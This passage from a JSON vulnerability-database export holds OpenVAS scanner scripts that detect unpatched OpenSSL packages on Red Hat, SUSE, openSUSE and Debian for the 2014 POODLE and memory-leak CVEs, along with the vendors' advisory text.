published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871274\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-17 05:58:23 +0200 (Fri, 17 Oct 2014)\");\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3567\", \"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"RedHat Update for openssl RHSA-2014:1652-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the referenced Knowledgebase article.\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:1652-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-October/msg00030.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1232123\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~34.el7_0.6\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~34.el7_0.6\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~34.el7_0.6\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-libs\", rpm:\"openssl-libs~1.0.1e~34.el7_0.6\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~30.el6_6.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~30.el6_6.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~30.el6_6.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:05", "references": ["2014:1386_1"], "pluginID": "1361412562310850875", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-10-16T00:00:00", "title": "SuSE Update for OpenSSL SUSE-SU-2014:1386-1 (OpenSSL)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310850875", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850875", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1386_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for OpenSSL SUSE-SU-2014:1386-1 (OpenSSL)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850875\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:21:00 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for OpenSSL SUSE-SU-2014:1386-1 (OpenSSL)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'OpenSSL'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n\n * Build option no-ssl3 is incomplete ((CVE-2014-3568)\n\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\");\n\n script_tag(name:\"affected\", value:\"OpenSSL on SUSE Linux Enterprise Server 11 SP2 LTSS, SUSE Linux Enterprise Server 11 SP1 LTSS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1386_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLES11\\.0SP2|SLES11\\.0SP1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-hmac\", rpm:\"libopenssl0_9_8-hmac~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-hmac-32bit\", rpm:\"libopenssl0_9_8-hmac-32bit~0.9.8j~0.66.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"SLES11.0SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-hmac\", rpm:\"libopenssl0_9_8-hmac~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-hmac-32bit\", rpm:\"libopenssl0_9_8-hmac-32bit~0.9.8j~0.66.1\", rls:\"SLES11.0SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:54", "references": ["2014:1331_1"], "pluginID": "1361412562310850621", "description": "The remote host is missing an update for the ", "edition": 8, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-10-30T00:00:00", "title": "SuSE Update for update openSUSE-SU-2014:1331-1 (update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310850621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850621", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1331_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for update openSUSE-SU-2014:1331-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850621\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-30 05:44:03 +0100 (Thu, 30 Oct 2014)\");\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"SuSE Update for update openSUSE-SU-2014:1331-1 (update)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following issues were fixed in this release:\n\n CVE-2014-3566: SSLv3 POODLE attack (bnc#901223) CVE-2014-3513,\n CVE-2014-3567: DTLS memory leak and session ticket memory leak\");\n script_tag(name:\"affected\", value:\"update on openSUSE 13.1, openSUSE 12.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1331_1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1j~1.68.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1j~11.56.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-08-01T10:49:16", "references": ["http://www.debian.org/security/2014/dsa-3053.html"], "pluginID": "703053", "description": "Several vulnerabilities have been found in OpenSSL, the Secure Sockets\nLayer library and toolkit.\n\nCVE-2014-3513 \nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server.\n\nCVE-2014-3566 (", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-10-16T00:00:00", "title": "Debian Security Advisory DSA 3053-1 (openssl - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2017-07-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703053", "id": "OPENVAS:703053", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3053.nasl 6735 2017-07-17 09:56:49Z teissa $\n# Auto-generated from advisory DSA 3053-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703053);\n script_version(\"$Revision: 6735 $\");\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n script_name(\"Debian Security Advisory DSA 3053-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-17 11:56:49 +0200 (Mon, 17 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-10-16 00:00:00 +0200 (Thu, 16 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3053.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u13.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1j-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been found in OpenSSL, the Secure Sockets\nLayer library and toolkit.\n\nCVE-2014-3513 \nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server.\n\nCVE-2014-3566 ('POODLE') \nA flaw was found in the way SSL 3.0 handled padding bytes when\ndecrypting messages encrypted using block ciphers in cipher block\nchaining (CBC) mode. This flaw allows a man-in-the-middle (MITM)\nattacker to decrypt a selected byte of a cipher text in as few as 256\ntries if they are able to force a victim application to repeatedly send\nthe same data over newly created SSL 3.0 connections. \n\nThis update adds support for Fallback SCSV to mitigate this issue.\n\nCVE-2014-3567 \nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large number\nof invalid session tickets to that server. \n\nCVE-2014-3568 \nWhen OpenSSL is configured with 'no-ssl3' as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:54:17", "references": 